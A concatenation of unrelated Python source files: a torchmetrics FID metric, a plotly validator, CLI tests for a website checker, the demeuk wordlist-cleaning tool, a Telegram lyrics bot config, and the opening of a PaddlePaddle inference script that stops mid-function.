self.add_state("fake_features", [], dist_reduce_fx=None)
def update(self, imgs: Tensor, real: bool) -> None: # type: ignore
"""Update the state with extracted features.
Args:
imgs: tensor with images feed to the feature extractor
real: bool indicating if imgs belong to the real or the fake distribution
"""
features = self.inception(imgs)
if real:
self.real_features.append(features)
else:
self.fake_features.append(features)
def compute(self) -> Tensor:
"""Calculate FID score based on accumulated extracted features from the two distributions."""
real_features = dim_zero_cat(self.real_features)
fake_features = dim_zero_cat(self.fake_features)
# computation is extremely sensitive so it needs to happen in double precision
orig_dtype = real_features.dtype
real_features = real_features.double()
fake_features = fake_features.double()
# calculate mean and covariance
n = real_features.shape[0]
mean1 = real_features.mean(dim=0)
mean2 = fake_features.mean(dim=0)
diff1 = real_features - mean1
diff2 = fake_features - mean2
cov1 = 1.0 / (n - 1) * diff1.t().mm(diff1)
cov2 = 1.0 / (n - 1) * diff2.t().mm(diff2)
# compute fid
return _compute_fid(mean1, cov1, mean2, cov2).to(orig_dtype)
class FID(FrechetInceptionDistance):
r"""
Calculates Fréchet inception distance (FID_) which is used to access the quality of generated images.
.. deprecated:: v0.7
Use :class:`torchmetrics.image.FrechetInceptionDistance`. Will be removed in v0.8.
Example:
>>> import torch
>>> _ = torch.manual_seed(123)
>>> fid = FID(feature=64)
>>> # generate two slightly overlapping image intensity distributions
>>> imgs_dist1 = torch.randint(0, 200, (100, 3, 299, 299), dtype=torch.uint8)
>>> imgs_dist2 = torch.randint(100, 255, (100, 3, 299, 299), dtype=torch.uint8)
>>> fid.update(imgs_dist1, real=True)
>>> fid.update(imgs_dist2, real=False)
>>> fid.compute()
tensor(12.7202)
"""
@deprecated(target=FrechetInceptionDistance, deprecated_in="0.7", remove_in="0.8", stream=_future_warning)
def __init__(
self,
feature: Union[int, torch.nn.Module] = 2048,
compute_on_step: bool = False,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable[[Tensor], List[Tensor]] = None,
) -> None:
void(feature, compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
|
import _plotly_utils.basevalidators
class OutsidetextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="outsidetextfont", parent_name="icicle", **kwargs):
super(OutsidetextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Outsidetextfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for `family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud
for `size`.
""",
),
**kwargs
)
|
"""Test cases for the console module."""
import logging
from website_checker import cli
def test_latency_subcommand_prints_usage(mock_click):
"""It prints the usage message with subcommand options."""
result = mock_click.invoke(cli.main, ["latency", "--help"])
assert "Usage: check latency [OPTIONS]" in result.output
assert "--url" in result.output
assert "--timeout" in result.output
assert "--threshold" in result.output
def test_latency_subcommand_invokes_latency_happy_path(
mock_click, mock_checks_latency, caplog
):
"""It invokes latency check and logs out pass."""
# arrange
mock_checks_latency.return_value = True
# act
with caplog.at_level(logging.INFO):
mock_click.invoke(cli.main, ["latency", "--url", "https://google.com"])
# assert
assert mock_checks_latency.called
assert "pass" in caplog.text
def test_latency_subcommand_invokes_latency_sad_path(
mock_click, mock_checks_latency, caplog
):
"""It invokes latency check and logs out failure."""
mock_checks_latency.return_value = False
with caplog.at_level(logging.INFO):
mock_click.invoke(cli.main, ["latency", "--url", "https://google.com"])
assert mock_checks_latency.called
assert "fail" in caplog.text
def test_latency_subcommand_raises_on_exception(
mock_click, mock_checks_latency, caplog
):
"""It invokes latency check and logs out exception."""
mock_checks_latency.side_effect = Exception("unknown error")
with caplog.at_level(logging.INFO):
mock_click.invoke(cli.main, ["latency", "--url", "https://google.com"])
assert '"error": "Exception(\'unknown error\')"' in caplog.text
assert "fail" in caplog.text
|
#!/usr/bin/env python3
"""
.. code-block:: none
Demeuk - a simple tool to clean up corpora
Usage:
demeuk [options]
Examples:
demeuk -i inputfile.tmp -o outputfile.dict -l logfile.txt
demeuk -i inputfile0*.txt -o outputfile.dict -l logfile.txt
demeuk -i inputdir/* -o outputfile.dict -l logfile.txt
demeuk -i inputfile -o outputfile -j 24
demeuk -i inputfile -o outputfile -c -e
demeuk -i inputfile -o outputfile --threads all
Standard Options:
-i --input <path to file> Specify the input file to be cleaned, or provide a glob pattern
-o --output <path to file> Specify the output file name.
-l --log <path to file> Optional, specify where the log file needs to be writen to
-j --threads <threads> Optional, demeuk doesn't use threads by default. Specify amount of threads to
spawn. Specify the string 'all' to make demeuk auto detect the amount of threads
to start based on the CPU's.
Note: threading will cost some setup time. Only speeds up for larger files.
--input-encoding <encoding> Forces demeuk to decode the input using this encoding.
--output-encoding <encoding> Forces demeuk to encoding the output using this encoding (default: en_US.UTF-8).
-v --verbose When set, the logfile will not only contain lines which caused an error, but
also line which were modified.
-n --limit <int> Limit the number of lines per thread.
--version Prints the version of demeuk.
Separating Options:
-c --cut Specify if demeuk should split (default splits on ':'). Returns everything
after the delimiter.
--cut-before Specify if demeuk should return the string before the delimiter.
When cutting, demeuk by default returns the string after the delimiter.
-f --cut-fields <field> Specifies the field to be returned, this is in the 'cut' language thus:
N N'th field, N- from N-th field to end line, N-M, from N-th field to M-th
field. -M from start to M-th field.
-d --delimiter <delimiter> Specify which delimiter will be used for cutting. Multiple delimiters can be
specified using ','. If the ',' is required for cutting, escape it with a
backslash. Only one delimiter can be used per line.
Check modules (check if a line matches a specific condition):
--check-min-length <length> Requires that entries have a minimal requirement of <length> unicode chars
--check-max-length <length> Requires that entries have a maximal requirement of <length> unicode chars
--check-case Drop lines where the uppercase line is not equal to the lowercase line
--no-check-controlchar Disable the dropping of lines containing control chars.
--check-email Drop lines containing e-mail addresses.
--check-hash Drop lines containing hashes.
--check-non-ascii If a line contain a non ascii char e.g. ü or ç (or everything outside ascii
range) the line is dropped.
Modify modules (modify a line in place):
--hex Replace lines like: $HEX[41424344] with ABCD.
--html Replace lines like: şifreyok with şifreyok.
--html-named Replace lines like: &#alpha; Those structures are more like passwords, so
be careful to enable this option.
--umlaut Replace lines like ko"ffie with an o with an umlaut.
--no-mojibake disable fixing mojibakes, useful if you know the encoding.
--no-encode disable guessing of encoding, this force to use the --input-encoding.
--no-tab disable replacing tab char with ':'
--non-ascii Replace non ascii char with their replacement letters. For example ü
becomes u, ç becomes c.
Add modules (Modify a line, but keep the original as well):
--add-lower If a line contains a capital letter this will add the lower case variant
--add-latin-ligatures If a line contains a single ligatures of a latin letter (such as ij), the line
is correct but the original line contain the ligatures is also added to output.
--add-split split on known chars like - and . and add those to the final dictionary.
--add-umlaut In some spelling dicts, umlaut are sometimes written as: o" or i" and not as
one char.
Remove modules (remove specific parts of a line):
--remove-punctuation Remove start and ending punctuation.
--remove-email Enable email filter, this will catch strings like
1238661:test@example.com:password
Macro modules:
-g --googlengram When set, demeuk will strip universal pos tags: like _NOUN_ or _ADJ
"""
from binascii import hexlify, unhexlify
from glob import glob
from hashlib import md5
from html import unescape
from inspect import cleandoc
from locale import LC_ALL, setlocale
from multiprocessing import cpu_count, Pool
from os import linesep, mkdir, path, walk
from re import compile as re_compile
from re import search
from re import split as re_split
from re import sub
from shutil import rmtree
from string import punctuation
from unicodedata import category
from chardet import detect
from docopt import docopt
from ftfy import fix_encoding
from ftfy.chardata import HTML_ENTITIES, HTML_ENTITY_RE
from ftfy.fixes import fix_latin_ligatures
from nltk import str2tuple
from nltk.tokenize import WhitespaceTokenizer
from unidecode import unidecode
version = '3.6.1'
HEX_REGEX = re_compile(r'\$HEX\[([0-9a-f]+)\]')
EMAIL_REGEX = '.{1,64}@([a-zA-Z0-9_-]*\\.){1,3}[a-zA-Z0-9_-]*'
HASH_HEX_REGEX = '^[a-fA-F0-9]+$'
HASH_LINUX_REGEX = '^\\$([0-9][aby]?|h)\\$[\\w\\.\\/]+(\\$[\\w\\.\\/]+)?'
def _unescape_fixup_named(match):
"""
Replace one matched HTML entity with the character it represents,
if possible.
Based on: ftfy.fixes._unescape_fixup
"""
text = match.group(0)
if text in HTML_ENTITIES:
return HTML_ENTITIES[text]
else:
return text
def _unescape_fixup(match):
"""
Replace one matched HTML entity with the character it represents,
if possible.
Based on: ftfy.fixes._unescape_fixup
"""
text = match.group(0)
if text.startswith('&#'):
unescaped = unescape(text)
# If html.unescape only decoded part of the string, that's not what
# we want. The semicolon should be consumed.
if ';' in unescaped:
return text
else:
return unescaped
else:
return text
def clean_googlengram(line):
"""Removes speechtags from line specific to the googlengram module
Param:
line (unicode)
Returns:
line (unicode)
"""
return_line = line.split("\t")[0] # Get the ngram, remove year, counter, etc
clean = []
words = WhitespaceTokenizer().tokenize(return_line)
for word in words:
# in >1-grams transitions to specific tags are written as:
# The_ADJ _NOUN_ (meaning from The there is a transition to a noun
# We remove those
if word[0] != '_' and word[-1] != '_':
# Split the token and the tag based on the '_'
token, tag = str2tuple(word, '_')
# Punct will be added using rules.
if len(token) > 1:
if tag != 'PUNCT' or tag != '.' or tag != '':
clean.append(token)
elif token not in punctuation:
clean.append(token)
return_line = ' '.join(clean)
if return_line != line:
return True, return_line
else:
return False, line
def remove_email(line):
"""Removes e-mail addresses from a line.
Params:
line (unicode)
Returns:
line (unicode)
"""
if '@' in line:
if search(f'{EMAIL_REGEX}(:|;)', line):
return True, sub(f'{EMAIL_REGEX}(:|;)', '', line)
return False, line
def add_lower(line):
"""Returns if the upper case string is different from the lower case line
Param:
line (unicode)
Returns:
False if they are the same
Lowered string if they are not
"""
line_lower = line.lower()
if line != line_lower:
return line_lower
else:
return False
def add_latin_ligatures(line):
"""Returns the line cleaned of latin ligatures if there are any.
Param:
line (unicode)
Returns:
False if there are not any latin ligatures
Corrected line
"""
cleaned_line = fix_latin_ligatures(line)
if line != cleaned_line:
return cleaned_line
else:
return False
def clean_add_umlaut(line):
"""Returns the line cleaned of incorrect umlauting
Param:
line (unicode)
Returns:
Corrected line
"""
cleaned_line = line
umlaut_dict = {
'a"': 'ä',
'i"': 'ï',
'o"': 'ö',
'u"': 'ü',
'e"': 'ë',
'A"': 'Ä',
'I"': 'Ï',
'O"': 'Ö',
'U"': 'Ü',
'E"': 'Ë',
}
for letter in umlaut_dict.keys():
cleaned_line = cleaned_line.replace(letter, umlaut_dict.get(letter))
if line != cleaned_line:
return True, cleaned_line
else:
return False, line
def remove_punctuation(line):
"""Returns the line without start and end punctuation
Param:
line (unicode)
Returns:
line without start and end punctuation
"""
return_line = line.strip(punctuation)
if return_line != line:
return True, return_line
else:
return False, line
def add_split(line, punctuation=[' ', '-', r'\.']):
"""Split the line on the punctuation and return elements longer then 1 char.
Param:
line (unicode)
Returns:
split line
"""
for p in punctuation:
if p in line:
return [i for i in re_split('|'.join(punctuation), line) if len(i) > 1]
return False
def check_case(line, ignored_chars=[' ', "'", '-']):
"""Checks if an uppercase line is equal to a lowercase line.
Param:
line (unicode)
ignored_chars list(string)
Returns:
true if uppercase line is equal to uppercase line
"""
for c in line:
c = str(c)
if c.lower() == c.upper():
if c in ignored_chars:
continue
else:
return False, c
return True, None
def check_length(line, min=0, max=0):
"""Does a length check on the line
Params:
line (unicode)
min (int)
max (int)
Returns
true if length is ok
"""
status = True
if min and status:
status = len(line) >= min
if max and status:
status = len(line) < max
return status
def check_hash(line):
"""Check if a line contains a hash
Params:
line (unicode)
Returns true if line does not contain hash
"""
if search(HASH_HEX_REGEX, line):
if len(line) in [32, 40, 64]:
return False
if len(line) > 0:
if line[0] == '$':
if search(HASH_LINUX_REGEX, line):
return False
return True
def check_email(line):
"""Check if lines contain e-mail addresses with a simple regex
Params:
line (unicode)
Returns
true is line does not contain email
"""
if search(EMAIL_REGEX, line):
return False
else:
return True
def check_non_ascii(line):
"""Checks if a line contains a non ascii chars
Params:
line (unicode)
Returns:
true if line does not contain non ascii chars
"""
try:
line.encode('ascii')
return True
except UnicodeEncodeError:
return False
def clean_cut(line, delimiters, fields):
"""Finds the first delimiter and returns the remaining string either after
or before the delimiter.
Params:
line (unicode)
delimiters list(unicode)
fields (unicode)
Returns:
line (unicode)
"""
for delimiter in delimiters:
if delimiter in line:
if '-' in fields:
start = fields.split('-')[0]
stop = fields.split('-')[1]
if start == '':
start = 1
if stop == '':
stop = len(line)
fields = slice(int(start) - 1, int(stop))
else:
fields = slice(int(fields) - 1, int(fields))
return True, delimiter.join(line.split(delimiter)[fields])
else:
return False, line
def clean_non_ascii(line):
"""Replace non ascii chars with there ascii representation.
Params:
line (Unicode)
Returns:
line (Unicode)
"""
cleaned_line = unidecode(line)
if line != cleaned_line:
return True, cleaned_line
else:
return False, line
def clean_tab(line):
"""Replace tab character with ':' greedy
Params:
line (bytes)
Returns:
line (bytes)
"""
if b'\x09' in line:
line = sub(b'\x09+', b'\x3a', line)
return True, line
else:
return False, line
def clean_hex(line):
"""Converts strings like '$HEX[]' to proper binary
Params:
line (bytes)
Returns
line (bytes)
"""
match = HEX_REGEX.search(line)
if match:
return True, unhexlify(match.group(1))
else:
return False, line
def clean_html(line):
"""Detects html encode chars and decodes them
Params:
line (Unicode)
Returns:
line (Unicode)
"""
return_line = HTML_ENTITY_RE.sub(_unescape_fixup, line)
if return_line != line:
return True, return_line
else:
return False, line
def clean_html_named(line):
"""Detects named html encode chars and decodes them
Params:
line (Unicode)
Returns:
line (Unicode)
"""
return_line = HTML_ENTITY_RE.sub(_unescape_fixup_named, line)
if return_line != line:
return True, return_line
else:
return False, line
def check_controlchar(line):
"""Detects control chars, returns True when detected
Params:
line (Unicode)
Returns:
Status, String
"""
for c in line:
# https://en.wikipedia.org/wiki/Unicode_character_property#General_Category
# Characters (they have meaning):
# Cc -> Control Char (End of stream)
# Cf -> Control flow (right to left)
# Non chars:
# Cn -> Not assigned
# Co -> Private use
# Cs -> Surrogate
if category(c) in ['Cc', 'Cf', 'Cn', 'Co', 'Cs']:
return True, c
return False, None
def try_encoding(line, encoding):
"""Tries to decode a line using supplied encoding
Params:
line (Byte): byte variable that will be decoded
encoding (string): the encoding to be tried
Returns:
False if decoding failed
String if decoding worked
"""
try:
# Try to decode the line
line_decoded = line.decode(encoding)
# Some encoding will decoded almost any line, lets check if we have invalid chars.
# If we have invalid chars (except for tab like chars) we will fail
for c in line_decoded:
if category(c) in ['Cc', 'Cf', 'Cn', 'Co', 'Cs']:
if c == '\t' or c == '\f':
continue
else:
return False
return line_decoded
except UnicodeDecodeError:
return False
def clean_mojibake(line):
"""Detects mojibake and tries to correct it.
Mojibake are string that are decoded incorrectly and then encoded incorrectly.
This results in strings like: único which should be único.
Param:
line (str)
Returns:
Cleaned string
"""
return_line = fix_encoding(line)
if return_line != line:
return True, return_line
else:
return False, line
def clean_encode(line, input_encoding):
"""Detects and tries encoding
Params:
line (bytes)
Returns:
Decoded UTF-8 string
"""
# Try either a user set of encodings or the default encoding set.
# When using multiple encoding is it beter to have multibyte encodings before
# Single byte encodings. Also it is beter to not include iso encoding by default.
# https://en.wikipedia.org/wiki/Character_encoding#Common_character_encodings
# Input_encoding is by default [utf8]
for encoding in input_encoding:
line_decoded = try_encoding(line, encoding)
if line_decoded is not False:
break
# All other methods failed, lets run the detect library on the line and try to guess the encoding.
if line_decoded is False:
encode = detect(line)
if encode.get('encoding'):
try:
line_decoded = line.decode(encode['encoding'])
except (UnicodeDecodeError, LookupError) as e: # noqa F841
return False, encode["encoding"]
else:
return False, 'Unknown'
# If we managed to get here, return decode line
return True, line_decoded
def clean_up(filename, chunk_start, chunk_size, config):
"""Main clean loop, this calls all the other clean functions.
Args:
line(bytes): Line to be cleaned up
Returns:
(str(Decoded line), str(Failed line))
"""
results = []
log = []
temp_folder = 'demeuk_tmp'
temp_file = md5(filename.encode()).hexdigest()
with open(filename, 'rb') as f:
f.seek(chunk_start)
lines = f.read(chunk_size).splitlines()
for line in lines:
# Check if the limit is set, if so minus 1 and if 0 is reached lets quit.
if type(config['limit']) is int:
if config['limit'] > 0:
config['limit'] -= 1
else:
break
# When stop is set all demeuking module will be skipped for this line.
stop = False
if config['verbose']:
log.append(f'----BEGIN---- {hexlify(line)}{linesep}')
# Replace tab chars as ':' greedy
if config.get('tab') and not stop:
status, line = clean_tab(line)
if status and config['verbose']:
log.append(f'Clean_tab; replaced tab characters; {line}{linesep}')
# Converting enoding to UTF-8
if config.get('encode') and not stop:
status, line_decoded = clean_encode(line, config.get('input_encoding'))
if status is False:
log.append(f'Clean_encode; decoding error with {line_decoded}; {line}{linesep}')
stop = True
elif status is True and config['verbose']:
log.append(f'Clean_encode; decoded line; {line_decoded}{linesep}')
else:
try:
line_decoded = line.decode(config.get('input_encoding')[0])
if config['verbose']:
log.append(f'Clean_up; decoded using input_encoding option; {line_decoded}{linesep}')
except (UnicodeDecodeError) as e: # noqa F841
log.append(f'Clean_up; decoding error with unknown; {line}{linesep}')
stop = True
# From here it is expected that line is correctly decoded!
# Check if some lines contain a hex string like $HEX[41424344]
if config.get('hex') and not stop:
status, line_decoded = clean_hex(line_decoded)
if status:
# Lines contains hex, this function will return binary string, so add it back to
# our undecoded lines
lines.append(line_decoded)
if config['verbose']:
log.append(f'Clean_hex; replaced $HEX[], added to queue and quiting; {line}{linesep}')
# Aborting future processing of this line.
stop = True
# Checks if there are any mojibakes inside the line
# You must mojibake before removing control chars! Some control chars
# are part of a valid mojibake.
if config.get('mojibake') and not stop:
status, line_decoded = clean_mojibake(line_decoded)
if status and config['verbose']:
log.append(f'Clean_mojibake; found a mojibake; {line}{linesep}')
# Checks if there are any control chars inside line
if config.get('check-controlchar') and not stop:
status, cc = check_controlchar(line_decoded)
if status:
# Control char detected
log.append(f'Check_controlchar; found controlchar {cc}; {line_decoded}{linesep}')
stop = True
# Check if there are html char in the line, decode them if there are
if config.get('html') and not stop:
status, line_decoded = clean_html(line_decoded)
if status and config['verbose']:
log.append(f'Clean_html; found html encode character, replaced; {line_decoded}{linesep}')
# Check if there are named html chars in the line
if config.get('html-named') and not stop:
status, line_decoded = clean_html_named(line_decoded)
if status and config['verbose']:
log.append(f'Clean_html_named; found named html character; {line_decoded}{linesep}')
# Should we do the cut?
if config.get('cut') and not stop:
status, line_decoded = clean_cut(line_decoded, config['delimiter'], config['cut-fields'])
if status and config['verbose']:
log.append(f'Clean_cut; field cutted; {line_decoded}{linesep}')
# Replace umlauts
if config.get('umlaut') and not stop:
status, line_decoded = clean_add_umlaut(line_decoded)
if status and config['verbose']:
log.append(f'Clean_umlaut; umlaut replaced; {line_decoded}{linesep}')
# Replace non-ascii
if config.get('non-ascii') and not stop:
status, line_decoded = clean_non_ascii(line_decoded)
if status and config['verbose']:
log.append(f'Clean_non_ascii; non-ascii replaced; {line_decoded}{linesep}')
# Should we remove emails?
if config.get('remove-email') and not stop:
status, line_decoded = remove_email(line_decoded)
if status and config['verbose']:
log.append(f'Remove_email; email found; {line_decoded}{linesep}')
if config.get('googlengram') and not stop:
status, line_decoded = clean_googlengram(line_decoded)
if status and config['verbose']:
log.append(f'Clean_googlengram; tos found and removed; {line_decoded}{linesep}')
if config.get('check-case') and not stop:
status, c = check_case(line_decoded)
if not status:
log.append(f'Check_case; dropped line because of {c}; {line_decoded}{linesep}')
stop = True
if config.get('check-length') and not stop:
if not check_length(line_decoded, min=config['check-min-length'], max=config['check-max-length']):
log.append(f'Check_length; dropped line because of failed length check; {line_decoded}{linesep}')
stop = True
if config.get('check-email') and not stop:
if not check_email(line_decoded):
log.append(f'Check_email; dropped line because found email; {line_decoded}{linesep}')
stop = True
if config.get('check-hash') and not stop:
if not check_hash(line_decoded):
log.append(f'Check_hash; dropped line because found a hash; {line_decoded}{linesep}')
stop = True
if config.get('check-non-ascii') and not stop:
if not check_non_ascii(line_decoded):
log.append(f'Check_non_ascii; dropped line because non ascii char found; {line_decoded}{linesep}')
stop = True
if config.get('remove-punctuation') and not stop:
status, line_decoded = remove_punctuation(line_decoded)
if status and config['verbose']:
log.append(f'Remove_punctuation; punctuation removed; {line_decoded}{linesep}')
# We ran all modules
if not stop:
# Some clean modules will modify the end result, those modification will be added here.
# They will be added to the running thread, this might cause one thread to have more work
# then others.
if config.get('add-split'):
modified_lines = add_split(line_decoded)
if modified_lines:
for modified_line in modified_lines:
if config['verbose']:
log.append(f'Add_split; new line because of split; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config.get('add-lower'):
modified_line = add_lower(line_decoded)
if modified_line:
if config['verbose']:
log.append(f'Add_lower; new line; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config.get('add-latin-ligatures'):
modified_line = add_latin_ligatures(line_decoded)
if modified_line:
if config['verbose']:
log.append(f'Add_latin_ligatures; new line; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config.get('add-umlaut'):
status, modified_line = clean_add_umlaut(line_decoded)
if status:
if config['verbose']:
log.append(f'Add_umlaut; new line; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config['verbose']:
log.append(f'----End---- {line_decoded}{linesep}{linesep}')
results.append(f'{line_decoded}{linesep}')
# We made it all the way here, check if we need to flush lines to disk
if len(log) > 10000 or len(results) > 10000:
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_result.txt'), 'a') as f:
f.write(''.join(results))
# Make sure list is deleted from memory
del results[:]
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_log.txt'), 'a') as f:
f.write(''.join(log))
# Make sure list is deleted from memory
del log[:]
# Processed all lines, flush everything
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_result.txt'), 'a') as f:
f.write(''.join(results))
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_log.txt'), 'a') as f:
f.write(''.join(log))
def chunkify(fname, size=1024 * 1024):
# based on: https://www.blopig.com/blog/2016/08/processing-large-files-using-python/
for filename in glob(fname, recursive=True):
if not path.isfile(filename):
continue
fileend = path.getsize(filename)
with open(filename, 'br') as f:
chunkend = f.tell()
while True:
chunkstart = chunkend
f.seek(size, 1)
f.readline()
chunkend = f.tell()
yield chunkstart, chunkend - chunkstart, filename
if chunkend > fileend:
break
def main():
arguments = docopt(cleandoc('\n'.join(__doc__.split('\n')[2:])))
if arguments.get('--version'):
print(f'demeuk - {version}')
exit()
if arguments.get('--input') and arguments.get('--output'):
input_file = arguments.get('--input')
output_file = arguments.get('--output')
else:
print(cleandoc('\n'.join(__doc__.split('\n')[2:])))
exit()
if arguments.get('--log'):
log_file = arguments.get('--log')
else:
log_file = '/dev/null'
if arguments.get('--threads'):
a_threads = arguments.get('--threads')
if a_threads == 'all':
a_threads = cpu_count()
else:
a_threads = int(a_threads)
else:
a_threads = 1
# Lets create the default config
config = {
'input_encoding': ['UTF-8'],
'cut': False,
'delimiter': ':',
'cut-fields': '2-',
'verbose': False,
'limit': False,
# Modify
'encode': True,
'mojibake': True,
'tab': True,
'hex': False,
'html': False,
'html-named': False,
'umlaut': False,
'non-ascii': False,
# Check
'length': False,
'check-min-length': 0,
'check-max-length': 0,
'check-controlchar': True,
'check-case': False,
'check-email': False,
'check-hash': False,
'check-non-ascii': False,
# Add
'add-lower': False,
'add-latin-ligatures': False,
'add-split': False,
'add-umlaut': False,
# Remove
'remove-punctuation': False,
'remove-email': False,
}
# Default modules
if arguments.get('--verbose'):
config['verbose'] = True
if arguments.get('--limit'):
config['limit'] = int(arguments.get('--limit'))
if arguments.get('--input-encoding'):
config['input_encoding'] = arguments.get('--input-encoding').split(',')
if arguments.get('--output-encoding'):
setlocale(LC_ALL, arguments.get('--output-encoding'))
else:
setlocale(LC_ALL, 'en_US.UTF-8')
if arguments.get('--cut'):
config['cut'] = True
if arguments.get('--delimiter'):
splitter = ','
if len(arguments.get('--delimiter')) >= 1:
if arguments.get('--delimiter')[0] == ',':
splitter = ';'
config['delimiter'] = arguments.get('--delimiter').split(splitter)
if arguments.get('--cut-before'):
config['cut-fields'] = '-1'
if arguments.get('--cut-fields'):
config['cut-fields'] = arguments.get('--cut-fields')
# Clean / modify modules
if arguments.get('--hex'):
config['hex'] = True
if arguments.get('--html'):
config['html'] = True
if arguments.get('--html-named'):
config['html-named'] = True
if arguments.get('--umlaut'):
config['umlaut'] = True
if arguments.get('--non-ascii'):
config['non-ascii'] = True
# Check modules
if arguments.get('--check-min-length'):
config['check-length'] = True
config['check-min-length'] = int(arguments.get('--check-min-length'))
if arguments.get('--check-max-length'):
config['check-length'] = True
config['check-max-length'] = int(arguments.get('--check-max-length'))
if arguments.get('--check-case'):
config['check-case'] = True
if arguments.get('--check-email'):
config['check-email'] = True
if arguments.get('--check-hash'):
config['check-hash'] = True
if arguments.get('--check-non-ascii'):
config['check-non-ascii'] = True
# Add modules
if arguments.get('--add-lower'):
config['add-lower'] = True
if arguments.get('--add-latin-ligatures'):
config['add-latin-ligatures'] = True
if arguments.get('--add-split'):
config['add-split'] = True
if arguments.get('--add-umlaut'):
config['add-umlaut'] = True
# Remove modules
if arguments.get('--remove-punctuation'):
config['remove-punctuation'] = True
if arguments.get('--remove-email'):
config['remove-email'] = True
# Negative modules
# Test if there are any disable functions, they must always overrule any other option.
if arguments.get('--no-mojibake'):
config['mojibake'] = False
if arguments.get('--no-encode'):
config['encode'] = False
if arguments.get('--no-check-controlchar'):
config['check-controlchar'] = False
if arguments.get('--no-tab'):
config['tab'] = False
# Some meta-modules, those overwrite settings
if arguments.get('--googlengram'):
config['cut'] = False
config['remove-email'] = False
config['encode'] = True
config['mojibake'] = False
config['check-controlchar'] = False
config['tab'] = False
config['googlengram'] = True
print('Main: starting')
if path.isdir('demeuk_tmp'):
rmtree('demeuk_tmp')
mkdir('demeuk_tmp')
pool = Pool(a_threads)
jobs = []
print('Main: starting chunking file.')
for chunk_start, chunk_size, filename in chunkify(input_file):
jobs.append(pool.apply_async(clean_up, (filename, chunk_start, chunk_size, config)))
print('Main: done chunking file.')
print('Main: starting threads.')
for job in jobs:
job.get()
pool.close()
print('Main: threads done. Combining results.')
p_output_file = open(output_file, 'w')
p_log_file = open(log_file, 'w')
for root, directories, files in walk('demeuk_tmp'):
for file_name in files:
if '_log.txt' in file_name:
with open(path.join(root, file_name), 'r') as f:
p_log_file.write(f.read())
if '_result.txt' in file_name:
with open(path.join(root, file_name), 'r') as f:
p_output_file.write(f.read())
p_output_file.close()
p_log_file.close()
rmtree('demeuk_tmp')
if __name__ == "__main__":
main()
|
import os
import time
class Var(object):
# Get a bot token from botfather
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
# Get from my.telegram.org
API_ID = int(os.environ.get("API_ID", 12345))
# Get from my.telegram.org
API_HASH = os.environ.get("API_HASH", "")
# ID of users that can't use the bot commands
BANNED_USERS = set(
int(x) for x in os.environ.get(
"BANNED_USERS", "").split())
# To record start time of bot
BOT_START_TIME = time.time()
# Genius Api From Here : https://genius.com/api-clients
API = os.environ.get("GENIUS_API", None)
# buttons
PAGENUM = int(os.environ.get("PAGENUM", 20))
class Tr(object):
START_TEXT = """
👋 Hi ! {} Welcome To @PyLyricsBot !
PyLyrics Is An [Open-Source](https://github.com/AmineSoukara/PyLyricsBot/fork) Bot That Can Help You Get Song Lyrics
"""
ABOUT_TEXT = """🤖 **My Name:** [Py Lyrics](t.me/PyLyricsBot)
📝 **Language:** [Python 3](https://www.python.org)
📚 **Framework:** [Pyrogram](https://github.com/pyrogram/pyrogram)
📡 **Hosted On:** [Heroku](heroku.com)
👨💻 **Developer:** [Amine Soukara](t.me/AmineSoukara)
💡 **Source Code:** [Github](https://github.com/AmineSoukara/PyLyricsBot/fork)
👥 **Support Group:** [Damien Help](https://t.me/DamienHelp)
📢 **Updates Channel:** [Damien Soukara](https://t.me/DamienSoukara)
❤ [Donate](https://www.paypal.me/AmineSoukara) (PayPal)
"""
HELP_TEXT = """💡 Just Send Me The Name Of The Song. That's it
❤ [Donate](https://www.paypal.me/AmineSoukara) (PayPal)
"""
ERR_TEXT = "⚠️ Genius API Not Found"
ERRTOKEN_TEXT = "😶 The Access Token Provided Is Expired, Revoked, Malformed Or Invalid For Other Reasons.",
NORES = "💬 No Results"
SEARCHING = "🔍 Searching For :"
WAIT = "💬 Please Wait !!"
ARTIST = "🗣 Artist :"
SONG = "🎵 Song :"
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import argparse
import cv2
import paddle
from paddle.inference import Config
from paddle.inference import create_predictor
from smoke.utils.vis_utils import encode_box3d, draw_box_3d
def get_ratio(ori_img_size, output_size, down_ratio=(4, 4)):
return np.array([[down_ratio[1] * ori_img_size[1] / output_size[1],
down_ratio[0] * ori_img_size[0] / output_size[0]]], np.float32)
def get_img(img_path):
img = cv2.imread(img_path)
ori_img_size = img.shape
img = cv2.resize(img, (960, 640))
output_size = img.shape
img = img/255.0
img = np.subtract(img, np.array([0.485, 0.456, 0.406]))
img = np.true_divide(img, np.array([0.229, 0.224, 0.225]))
img = np.array(img, np.float32)
